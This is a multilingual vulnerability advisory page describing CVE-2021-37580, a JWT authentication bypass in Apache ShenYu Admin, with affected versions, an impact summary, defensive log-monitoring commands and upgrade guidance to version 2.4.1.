Platform
java
Component
org.apache.shenyu:shenyu-admin
Opgelost in
2.3.1
2.4.1
CVE-2021-37580 is a critical authentication bypass vulnerability discovered in Apache ShenYu Admin. The flawed implementation of JSON Web Token (JWT) handling within ShenyuAdminBootstrap allows attackers to circumvent authentication mechanisms. This vulnerability affects versions up to 2.4.0 and can lead to unauthorized access and potential compromise of the ShenYu Admin interface. A patch is available in version 2.4.1.
This vulnerability presents a significant risk because it allows attackers to bypass authentication entirely. An attacker can craft malicious JWTs to impersonate legitimate users, granting them full administrative access to the ShenYu Admin console. This access could be used to modify configurations, inject malicious code, steal sensitive data, or even compromise the entire ShenYu service mesh. The potential impact is severe, as ShenYu Admin is often used to manage and control critical infrastructure components. Successful exploitation could lead to widespread disruption and data breaches.
This vulnerability is considered highly exploitable due to the ease of crafting malicious JWTs. Public proof-of-concept exploits are likely to emerge, further increasing the risk. The vulnerability was publicly disclosed on November 17, 2021. While no confirmed active exploitation campaigns have been publicly reported, the critical severity and ease of exploitation warrant immediate attention. It is not currently listed on the CISA KEV catalog.
Organizations deploying Apache ShenYu Admin for service mesh management, particularly those using versions 2.3.0 or 2.4.0, are at significant risk. This includes environments where ShenYu Admin is exposed to untrusted networks or where access controls are not strictly enforced. Shared hosting environments utilizing ShenYu Admin are also at increased risk.
• java / server:
# Check for ShenYu Admin version
java -jar shenyu-admin.jar -version
# Monitor ShenYu Admin logs for JWT signature verification failures
grep -i 'JWT signature verification failed' /path/to/shenyu-admin.logdisclosure
patch
Exploit Status
EPSS
93.99% (100% percentiel)
CVSS-vector
The primary mitigation is to upgrade to Apache ShenYu Admin version 2.4.1 or later, which contains the fix for this vulnerability. If upgrading immediately is not possible, consider implementing temporary workarounds. While a direct WAF rule is difficult to implement due to the JWT nature, strict input validation on all parameters passed to the ShenYu Admin API can help reduce the attack surface. Monitoring JWT signature verification failures in ShenYu logs can provide early detection of potential attacks. After upgrading, confirm the fix by attempting to authenticate with a known valid JWT and verifying that authentication proceeds as expected.
Actualice Apache ShenYu Admin a una versión posterior a la 2.4.0 que haya corregido la vulnerabilidad de autenticación JWT. Consulte las notas de la versión para obtener detalles sobre la actualización.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2021-37580 is a critical vulnerability in Apache ShenYu Admin versions up to 2.4.0 that allows attackers to bypass authentication by exploiting improper JWT handling, potentially granting unauthorized access.
If you are using Apache ShenYu Admin versions 2.3.0 or 2.4.0, you are affected by this vulnerability and should upgrade immediately.
Upgrade to Apache ShenYu Admin version 2.4.1 or later to remediate the vulnerability. Consider temporary workarounds like input validation if immediate upgrade is not possible.
While no confirmed active exploitation campaigns have been publicly reported, the critical severity and ease of exploitation warrant immediate attention and proactive mitigation.
Refer to the Apache ShenYu security advisory for detailed information and updates: https://shenyu.apache.org/news/announcements/security/cve-2021-37580/
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.
Upload je pom.xml-bestand en we vertellen je direct of je getroffen bent.